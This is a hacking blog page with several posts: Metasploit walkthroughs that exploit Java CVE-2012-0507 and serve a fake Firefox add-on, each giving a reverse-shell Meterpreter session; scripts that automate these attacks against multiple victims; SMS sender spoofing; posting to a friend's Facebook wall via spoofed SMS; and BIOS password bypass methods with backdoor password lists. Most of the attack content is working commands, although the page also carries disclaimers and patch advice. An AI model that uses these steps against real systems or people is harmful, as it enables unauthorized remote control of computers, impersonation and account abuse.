How to hack remote computer using Metasploit? Exploiting Java vulnerability CVE-2012-0507

07:06 |

Requirements:


  • VirtualBox 
  • Target OS (Windows, ...)
  • PenTesting distro (BackTrack)
  • JRE 6 (an unpatched release, i.e. older than 6 Update 31)

CVE-2012-0507 is a vulnerability in the JRE: the AtomicReferenceArray class implementation did not properly check whether the array it wraps is of the expected Object[] type. Because that backing array can be supplied through deserialization, an untrusted applet can end up storing an object of one type into an array declared as another, and this type confusion is what the exploit uses. A malicious Java application or applet could use the flaw to crash the Java Virtual Machine (JVM) or to bypass Java sandbox restrictions.

Security news: this vulnerability affects Windows, Mac and Linux. Last month, the Flashback malware infected more than 600,000 Mac computers by exploiting it. Recently, the INSS and Amnesty International UK websites were injected with malicious code that exploits CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox. I have set up two virtual machines named "Target" and "BT5". I have installed Windows XP (SP2) in the Target and BackTrack 5 R2 in BT5.

(Need help configuring the VMs? It's covered in my earlier post.)


Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install JRE 6, an unpatched release older than 6 Update 31 (the release that fixed CVE-2012-0507).

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate". This updates the Metasploit Framework (MSF) with the latest exploits and payloads; BT5 needs Internet access for it. As CVE-2012-0507 is a recent vulnerability, you have to update MSF before proceeding further.


Slow Internet connection? If so, you can download the java_atomicreferencearray module alone instead of updating all modules.
Download java_atomicreferencearray.rb and put it in the folder "/opt/metasploit/msf3/modules/exploits/multi/browser/".

Then download CVE-2012-0507.jar and put it in the folder "/opt/metasploit/msf3/data/exploits/".

Part III :

Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This brings up the Metasploit console, where you interact with MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This selects the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display which settings are available and/or required for this module.
Now type "set SRVPORT 80"
and "set URIPATH /".
This makes the malicious page the root of a web server on the standard HTTP port, so the victim only has to open http://<BT5 IP>/ (binding port 80 needs root, which you already are on BackTrack).

 Step 3: Set Payload
Type "show payloads" to display the list of payloads. We are going to use the 'reverse_tcp' payload, which makes the Target open a TCP connection back to the PenTesting machine (on LPORT, 4444 by default), so it works even when the Target sits behind a firewall that blocks inbound connections.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address]: to receive the reverse connection, we have to set our own IP in LHOST.

Open the Terminal and type "ifconfig". This displays the IP information of our PenTesting machine. On a VirtualBox host-only network the IP will be 192.168.56.x; for instance, let me say the IP is 192.168.56.10.

Now type in the msfconsole: "set LHOST 192.168.56.10".

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine.

Step 1:
Type "exploit" in the msfconsole. This starts the reverse handler on our machine and the HTTP server (e.g. http://192.168.56.10), then waits for someone to connect. Once the victim connects, the server sends a JAR that exploits CVE-2012-0507, and the payload connects back to the handler.

step 2:

Open Firefox or IE in the Target machine.
Enter "http://192.168.56.10".
The page appears blank, but the exploit runs in the background (the Java plugin loads the applet).
Step 3:
Switch to the BT5 machine; msfconsole shows the session being opened.
Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1". This opens the session with id '1' and brings you into Meterpreter, which lets you interact with and control the Target.
Step 4: Upload files
Yeeeh..! We have a backdoor into the Target machine; now we can run commands on it.

For example, typing 'sysinfo' displays the system information.
You can also upload and execute your own executable files on the Target machine.

"upload /Test.exe C:\\" uploads Test.exe from the root of the BT5 file system to the C drive of the Target (the doubled backslash is the escaping Meterpreter expects).

"execute -f C:\\Test.exe" runs our uploaded file on the Target.
Security Tips:
Update your JRE to the latest version. CVE-2012-0507 was fixed in Java SE 6 Update 31 and 7 Update 3 (Oracle's February 2012 Critical Patch Update); anything older is exploitable. If you do not need Java in the browser, disable the Java plugin, since this attack needs nothing more than a visit to a web page.


Conclusion:
        I hope this article has given you a good insight into how to use the Metasploit Framework to exploit this Java vulnerability, and that it helps you get into the PenTesting world!

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials

07:03 |

I am going to explain how to hack any Windows machine (XP, 7) with the help of Metasploit.
Unlike the last tutorial, we are not going to exploit any software vulnerability; we are going to use a social engineering technique instead: the victim installs a Firefox add-on that runs our payload with the privileges of the browser.

What exactly i am going to do?


  1. Create a fake Firefox extension with Metasploit that backdoors the victim system.
  2. Trick the user into installing the add-on.
  3. Break into the Target machine.
Pre-configuration:
  • As usual, set up two virtual machines (VMs) in VirtualBox, named "Target" and "Attacker".
  • Install Windows XP or 7 in the Target VM.
  • Install BackTrack in the Attacker VM.
Part I: Update the Metasploit 
As we are going to use a recent module, you are advised to update the Metasploit modules. Don't know how? No need to worry!
  • Open the Terminal 
  • type msfupdate
  • This will update the Metasploit with latest modules :)
Part II: Configuring settings in Metasploit for the fake-addon exploit
Step 1:

Open the Terminal and type "msfconsole" to get the Metasploit console.

Step 2:
Type "use exploit/multi/browser/firefox_xpi_bootstrapped_addon" in the console.

Step 3:
Now we have to know the list of settings available for this exploit module. To get the list, type "show options" in the console.
  Unlike the last tutorial, this module has an extra setting, "addonname".

Step 4: Configurations
 Let us configure the settings for the exploit.
Type the following commands one by one in the console.

Command: set addonname fake
Details: Name for the fake add-on. You can change "fake" to any name; it is what the victim sees in the install dialog.

Command: set SRVHOST 192.168.56.11
Details: Here 192.168.56.11 is the IP of BackTrack. You can get this IP by typing "ifconfig" in the terminal. If you have trouble getting the IP details, please drop a comment or read my previous post.
Command: set SRVPORT 80
Details: Our server will be accessed via port 80 (the default HTTP port).

Command: set URIPATH fakeEx
Details: The path at which the fake add-on will be available for download, e.g. http://192.168.56.11/fakeEx

Command: set LHOST 192.168.56.11
Details: Here 192.168.56.11 is the IP of BackTrack, the address the payload connects back to. You can get it by typing "ifconfig" in the terminal.

Step 5: Payload
 As usual, we can use a reverse TCP payload for this attack as well; because the add-on ends up executing a native program on the victim's Windows box, the payload is a Windows one this time. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Part III: Social Engineering Attack

Having configured the settings for the exploit, what else? Let us launch it.
Type "exploit" in the console.
Now the exploit is started. Our fake add-on is available at "http://192.168.56.11/fakeEx".
 Once the victim visits the link, the page asks the user to install the add-on in order to view it. Once the user installs the add-on, the system is backdoored. The add-on is unsigned, so Firefox shows its install warning and the user has to click through it (Firefox releases since version 48 refuse unsigned add-ons outright, so this only works on older browsers or with signing enforcement disabled).
 Now you can control the victim system from Meterpreter.
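This tutorial and the CVE-2012-0507 one above each type the same kind of msfconsole settings by hand. As an added example, not from either original post, the script below writes those settings as Metasploit resource scripts that "msfconsole -r" loads, so a lab run is repeatable. It assumes the attacker IP is on the VirtualBox host-only network, leaves LPORT at Metasploit's default (4444), runs each exploit as a background job, and needs root to bind port 80; the function names and the rc/ output directory are the editor's, and nothing in it contacts a target.

```shell
#!/bin/sh
# Added example (editor's code, not from the original posts): write the two
# tutorials' msfconsole settings as resource scripts instead of retyping them.
# Assumptions: LHOST/SRVHOST is the BackTrack IP on the host-only network,
# LPORT stays at Metasploit's default 4444, msfconsole is on the PATH.

# Resource script for the CVE-2012-0507 tutorial: $1 = attacker IP, $2 = output file.
write_java_ara_rc() {
    lhost=$1; out=$2
    cat > "$out" <<EOF
use exploit/multi/browser/java_atomicreferencearray
set SRVPORT 80
set URIPATH /
set payload java/meterpreter/reverse_tcp
set LHOST $lhost
set ExitOnSession false
exploit -j -z
EOF
}

# Resource script for the fake Firefox add-on tutorial:
# $1 = attacker IP, $2 = add-on name shown to the victim, $3 = output file.
write_xpi_rc() {
    lhost=$1; name=$2; out=$3
    cat > "$out" <<EOF
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set ADDONNAME $name
set SRVHOST $lhost
set SRVPORT 80
set URIPATH fakeEx
set LHOST $lhost
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
exploit -j -z
EOF
}

# The command line that loads a resource script into a quiet console.
msf_run_line() {
    printf 'msfconsole -q -r %s\n' "$1"
}

# Stand-alone use: ./msf_rc.sh 192.168.56.10  -> writes rc/java_ara.rc and rc/fake_xpi.rc
# and prints the msfconsole lines to run them (as root, for port 80).
if [ -n "${1-}" ]; then
    mkdir -p rc
    write_java_ara_rc "$1" rc/java_ara.rc
    write_xpi_rc "$1" fake rc/fake_xpi.rc
    msf_run_line rc/java_ara.rc
    msf_run_line rc/fake_xpi.rc
fi
```

"exploit -j -z" with "ExitOnSession false" keeps the web server and handler running as a job, so several victims can connect and each gets its own session; "sessions -l" then lists them as in Part IV of the earlier post.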
 Countermeasures:
       I believe you understand the risk of installing add-ons from unknown sources. So think twice before installing an add-on, and only use trusted ones. Search Google for reviews of the add-on.

Disclaimer:
      This article is for educational purposes only. I suggest you try this method in a controlled VirtualBox environment. I am not responsible for your illegal activity.

SMS from any mobile number to any mobile number

07:02 |

How to send an SMS from any mobile number to any mobile number, i.e. send an SMS that appears to come from your friend's mobile to your own mobile, or from one friend's mobile to another's. This technique is called SMS spoofing: the sender ID of the message is set to a number the sender does not own. It can be used to prank friends or simply to send free SMS that looks like it came from their numbers. So friends, read on...

What is SMS Spoofing?
Spoofing is mimicking the original; SMS spoofing is a technique for sending an SMS with a forged sender. By anonymous I mean that the message can carry any mobile number as its sender, because the originating address of an SMS is just a field the sending party fills in.

This is not actually a trick or hack; it is a service that a company provides, and the company does not verify the sender ID, i.e. that the number we claim to send from is ours. So the service lets us send an SMS from any number to any number, and the number we enter is what the victim sees.
In other words, we are exploiting the missing sender ID verification.

Feature's of SMS spoofing:
  1. Spoofed sms (any mobile number to any mobile number)
  2. 100% anonymous  messages
  3. Worldwide Network (i.e. we can send SMS all over the world)
  4. No advertisements
  5. Instant Delivery of SMS
How to use this hack?
1. First of all, register here. Fill in the details as required...

2. After registering you get 25 free credits, i.e. you can send 25 free SMS from any number to any number. To use it again, register another mobile number and email ID; 25 SMS is the limit per registered number. Usually people have two or three SIMs.
3. After registering you will receive a password on the registered mobile number.
4. Log in with the password you received on the mobile.
5. Go to "Send SMS to number".
6. Enter the details and click Send.
7. That's all the hack. I know it's limited, but it's awesome... isn't it?
Please: do not use this for any illegal activities.

Hack friends facebook wall 100% working

07:01 |

Needed:
Your friend must have activated Facebook Mobile (posting by SMS).

Procedure:
1) First find the mobile number your friend activated for Facebook Mobile.
2) You can find it on his Facebook profile: go to "Info" and scroll to the bottom of the page.

3) Now, in the "SEND SMS TO" column of the SMS spoofing service from the previous post, type any one of the Facebook numbers:
Facebook numbers:
919232232665
919223055519
919223055509
919223055508
919223055528

4) In the "SENDER ID FROM" column, type your friend's Facebook-activated mobile number.

5) In the message box, type your message; it will be posted as his status, because Facebook treats the SMS sender number as proof of who is posting.

6) Press the "Send SMS" button and you are done.

Note: if the Facebook number has changed, search Google for the new one.

BIOS Password Crack

06:58 |

 This is a password hack, but it clears the BIOS settings so that the next time you start the PC, the CMOS does not ask for any password. If you can get a DOS prompt, you can reset the BIOS settings to their defaults. To clear the CMOS do the following:
Get a DOS prompt and type (press Enter after each line):

Code:
C:\> DEBUG
-o 70 2e
-o 71 ff
-q
C:\> exit
Restart the computer. It works on most versions of the AWARD BIOS. What the two "o" commands do: port 70h is the CMOS index register and 71h the data register, so they write the byte FFh into CMOS offset 2Eh. In the standard AT CMOS map, offsets 2Eh and 2Fh hold the checksum of offsets 10h to 2Dh; on the next boot the BIOS finds the checksum wrong, reports a CMOS error and reloads its defaults, which include no password.
Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually by pressing F2, DEL or CTRL+ALT+S during the boot sequence), go to STANDARD CMOS SETUP, set the channel to which you have connected the hard disk to TYPE=Auto, MODE=Auto, then SAVE & EXIT SETUP. Now you have access to the hard disk.
Standard BIOS backdoor passwords 
The first, less invasive, attempt to bypass a BIOS password is to try one of these standard manufacturer backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key for "_" on the US keyboard corresponds to "?" on some European keyboards (such as Italian and German ones), so, for example, you should type AWARD?SW on those keyboards. Also remember that passwords are case sensitive. The last two passwords in the AWARD BIOS list are in Russian.
Flashing BIOS via software
If you have access to the computer when it's turned on, you can try one of the programs that remove the password from the BIOS by invalidating its memory (strictly, this clears the CMOS configuration RAM; the BIOS ROM itself is not rewritten). You may not have such a program at hand when you get access to the computer, so you'd better learn to do manually what they do. You can reset the BIOS to its default values with the MS-DOS tool DEBUG (type DEBUG at the command prompt; do it in pure MS-DOS mode, not from an MS-DOS shell window in Windows, because protected-mode Windows can intercept direct port I/O). Once you are in the debug environment, enter the following commands:
AMI/AWARD BIOS
Code:
O 70 17
O 71 17
Q
PHOENIX BIOS
Code:
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don’t have CMOS)
Code:
O 70 2E
O 71 FF
Q
Note that the first letter is the letter "O" (DEBUG's "output to port" command), not the number "0". The numbers that follow are two bytes in hex: first the CMOS offset, written to the index port 70h, then the value, written to the data port 71h.
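Why these two-byte writes work, as an added example that is not from the original post: the script below models the standard AT CMOS checksum (offsets 2Eh-2Fh cover 10h-2Dh) over a constructed 32-byte image and shows that a DEBUG write such as "o 70 2e" / "o 71 ff", or the AMI/AWARD "o 70 17" / "o 71 17", leaves the stored checksum wrong. The image, the function names and the /dev/nvram offset (the Linux nvram driver exposes CMOS from offset 0Eh) are the editor's assumptions; vendor BIOSes also checksum other ranges, which is why the page lists more than one register/value pair.

```shell
#!/bin/sh
# Added example (editor's code, not from the original post).
# Port 70h = CMOS index register, 71h = data register, so "o 70 XX" then "o 71 YY"
# writes byte YY at CMOS offset XX. In the standard AT CMOS map, offsets 2Eh-2Fh
# hold a 16-bit big-endian checksum of offsets 10h-2Dh. POST recomputes it; a
# mismatch means "CMOS checksum error" and the defaults (no password) are reloaded.

# Sum the hex bytes given as arguments into a 16-bit value, printed as 4 hex digits.
cmos_sum16() {
    sum=0
    for b in "$@"; do sum=$(( (sum + 0x$b) & 0xFFFF )); done
    printf '%04X\n' "$sum"
}

# $1 = 32 space-separated hex bytes for CMOS offsets 10h-2Fh.
# Prints "ok" if the stored checksum (last two bytes) matches the first 30, else "bad".
cmos_checksum_status() {
    set -- $1
    [ $# -eq 32 ] || { echo "need 32 bytes"; return 2; }
    data=''; i=0
    while [ $i -lt 30 ]; do data="$data $1"; shift; i=$((i+1)); done
    stored=$(printf '%s%s' "$1" "$2" | tr 'a-f' 'A-F')
    calc=$(cmos_sum16 $data)
    if [ "$calc" = "$stored" ]; then echo ok; else echo bad; fi
}

# Model DEBUG's "o 70 <off>" / "o 71 <val>" against an image of offsets 10h-2Fh:
# print the image with the byte at CMOS offset <off> (hex) replaced by <val>.
cmos_poke() {
    dump=$1; off=$((0x$2)); val=$3
    idx=$((off - 0x10)); i=0; out=''
    for b in $dump; do
        if [ $i -eq $idx ]; then b=$val; fi
        out="$out $b"; i=$((i+1))
    done
    printf '%s\n' "${out# }"
}

# On x86 Linux with the nvram driver (modprobe nvram; needs root) the real bytes can
# be read. /dev/nvram starts at CMOS offset 0Eh (assumption), so skip 2 bytes for 10h.
cmos_dump_linux() {
    od -An -tx1 -v -j 2 -N 32 /dev/nvram | tr -s ' \n' ' ' | sed 's/^ //; s/ $//'
}

# Constructed demo image of offsets 10h-2Fh: floppy type, equipment byte, 640 KB
# base memory, some extended memory, and a correct checksum 0100h at 2Eh-2Fh.
CMOS_DEMO='40 00 00 00 02 80 02 00 3C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00'

# Stand-alone demo: intact image, then after the AWARD and AMI sequences from the page.
demo() {
    echo "intact            : $(cmos_checksum_status "$CMOS_DEMO")"
    echo "after o 70 2e/71 ff: $(cmos_checksum_status "$(cmos_poke "$CMOS_DEMO" 2e ff)")"
    echo "after o 70 17/71 17: $(cmos_checksum_status "$(cmos_poke "$CMOS_DEMO" 17 17)")"
}
demo
```

Note that the AMI/AWARD pair overwrites a data byte (offset 17h, part of the extended-memory size) and the generic pair overwrites a checksum byte; either way the stored and computed checksums disagree, which is all the BIOS checks at POST.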
Flashing BIOS via hardware 
If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to clear the CMOS via hardware is to plug, unplug, or switch a jumper on the motherboard (by "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins; you unplug it and plug it onto the central pin and the pin on the opposite side, so if the jumper is normally on position 1-2, you put it on 2-3, or vice versa). This jumper is not always located near the BIOS; it could be anywhere on the motherboard. To find the correct jumper, read the motherboard's manual.
Once you've located the correct jumper, switch it (or plug or unplug it, depending on what the manual says) while the computer is turned OFF. Wait a couple of seconds, then put the jumper back in its original position. On some motherboards the computer turns itself on automatically after the CMOS is cleared; in that case, turn it off, put the jumper back in its original position, then turn it on again. Other motherboards require you to turn the computer on for a few seconds to clear the CMOS.
If you don't have the motherboard's manual, you'll have to "brute force" it by trying all the jumpers. In this case, try first the isolated ones (not in a group), the ones near the BIOS, and the ones you can switch (as explained above). If all of them fail, try the others. However, modify only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually for). If the password request screen still appears, try another one.
If after clearing the CMOS the computer won't boot when you turn it on, turn it off and wait some seconds before retrying.
Removing the battery
If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can removethe battery that keeps the BIOS memory alive. It’s a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I’d suggest you to remove it for about one hour to be sure, because if you put it back when the data aren’t erased yet you’ll have to wait more time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery overnight.
Important note: in laptop and notebooks you don’t have to remove the computer’s power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.
Short-circuiting the chip
Another way to clear the CMOS RAM is to short-circuit two pins of the RTC/CMOS chip for a few seconds. You can do that with a small piece of electric wire or a bent paper clip. Always make sure the computer is turned OFF before trying this.
Here is a list of RTC/CMOS chips commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If the chip you are working on matches one of the following, you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)
Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
Code:
       gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
Code:
    80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips, have a built-in battery that should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't clear the CMOS by removing a battery). When the battery fails, the RTC chip has to be replaced.
CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced (in this case it is recommended to replace the 1287 with a 1287A). The Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
Code:
         __________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15
    11 -|          |-  14
gnd 12 -|__________|-  13
NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.
Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
Code:
5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners – lower left and upper right. You might also try pins 12 and 20.
Code:
          __________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13
Replacing the chip
If nothing works, you could replace the existing BIOS chip with a new one bought from a specialized electronics shop or your computer supplier. It's a quick operation if the chip sits in a socket and isn't soldered to the motherboard; otherwise you'll have to unsolder it and fit the new one. In that case it is more convenient to solder in a socket into which you then plug the new chip, in case you have to change it again. If you can't find the BIOS chip made specifically for your motherboard, buy one of the same type (probably one of those shown above) and look on your motherboard manufacturer's website for the BIOS image to download. Then copy that image onto the chip you bought with an EPROM programmer.
Important
Whatever method you use, when you clear the CMOS not only the password but also all other configuration data are reset to the factory defaults, so the first time you boot after clearing it you should enter the CMOS configuration menu (as explained before) and fix some things up.
Also, when Windows boots it may find some new devices because of the new BIOS configuration; in that case you'll probably need the Windows installation CD, because Windows may ask for some files. If Windows doesn't see the CD-ROM, try ejecting and re-inserting it. If Windows can't find the CD-ROM drive even though you set it properly in the BIOS, just reboot with the reset button and on the next run Windows should find it. However, most files needed while installing new hardware can also be found in C:\WINDOWS, C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF.
Key Disk for Toshiba laptops
Some Toshiba notebooks allow bypassing the BIOS password by inserting a "key disk" in the floppy drive while booting. To create a Toshiba key disk, take a 720 KB or 1.44 MB floppy, format it (if it isn't already), then use a hex editor such as Hex Workshop to set the first five bytes of the second sector (the one after the boot sector) to 4B 45 59 00 00 (the first three bytes are the ASCII for "KEY", followed by two zeroes). Once you have created the key disk, put it in the notebook's drive and turn it on, then push the reset button, and when asked for the password press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration, where you can set a new password.
Key protected cases
A final note about those old computers (up to 486 and early Pentiums) protected with a key lock that disabled the mouse and keyboard or the power button. All you have to do is follow the wires from the key lock, locate the jumper they connect to and unplug it.